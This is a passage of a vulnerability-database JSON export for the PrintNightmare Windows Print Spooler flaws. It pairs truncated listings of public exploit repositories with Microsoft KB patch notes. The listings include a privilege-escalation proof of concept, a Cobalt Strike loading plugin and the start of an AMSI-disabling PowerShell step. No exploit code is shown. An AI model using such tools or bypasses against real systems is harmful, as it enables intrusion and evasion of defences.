9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-23T00:06:36", "description": "# CVE-2021-1675 - PrintNightmare DSC Mitigation (PowerShell)\n\n> ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T17:29:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-12-22T20:12:23", "id": "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-07T03:16:37", "description": "# CVE-2021-1675_RDL_LPE\nPrintNightMare LPE\u63d0\u6743\u6f0f\u6d1e\u7684CS \u53cd\u5c04\u52a0\u8f7d\u63d2\u4ef6\u3002\u5f00\u7bb1\u5373\u7528\u3001\u901a\u8fc7...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-01T11:25:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-08-06T10:28:54", "id": "14B62DA4-FBC4-5B89-AB9F-9F8E3505AFAD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:23:36", "description": "# cve-2021-1675\n#disble amsi: (copy into powershell)\nhttps://raw...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-25T06:47:20", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-10-25T06:55:39", "id": "EA908F34-E282-522D-A0C0-E6D40C0621CD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:41", "description": "# CVE-2021-1675\nCVE-2021-1675: ZERO-DAY VULNERABILITY IN WINDOWS...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T18:01:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T04:58:56", "id": "E601A788-C87D-5DD7-98BA-A68C2FEDE978", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:36:58", "description": "# PrintNightmare Local Privilege Escalation PoC \n\n src/nightmare...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-30T04:47:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-05-03T17:03:53", "id": "4749D0AA-8CE9-53E3-8EFF-E818FDC61B24", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:35:50", "description": "# CVE-2021-1675 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stewa...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:34", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-05-10T14:32:19", "id": "FF81AF93-C247-5242-810E-AA1201C16776", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:18:52", "description": "# zeroscan\r\n\r\nZeroscan is a Domain Controller vulnerability scan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-06-23T12:23:48", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1675"], "modified": "2022-02-22T01:57:05", "id": "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "mskb": [{"lastseen": "2023-05-19T10:52:07", "description": "None\n**6/21/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). \n**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\n**Note: **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptoms**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this update, you might have issues printing to certain printers. Various brands and models are affected, primarily receipt or label printers that connect via USB.**Note **This issue is not related to [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) or [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>).| This issue is resolved in KB5004237. \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. These changes will be included in the next security update to this channel. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004945>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004945](<https://download.microsoft.com/download/6/0/4/6046cc97-919a-434d-86de-db2fe63580d0/5004945.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/6/2/d/62d4d81c-0498-4abf-95e7-b9be18ddcabd/SSU_version_19041_1081.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004945 (OS Builds 19041.1083, 19042.1083, and 19043.1083) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004945", "href": "https://support.microsoft.com/en-us/help/5004945", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:09", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004950>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004950](<https://download.microsoft.com/download/7/6/2/7621b6b3-765e-4b2a-9358-5d49ad17e3fa/5004950.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004950 (OS Build 10240.18969) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004950", "href": "https://support.microsoft.com/en-us/help/5004950", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:14", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003671](<https://support.microsoft.com/help/5003671>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004954>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 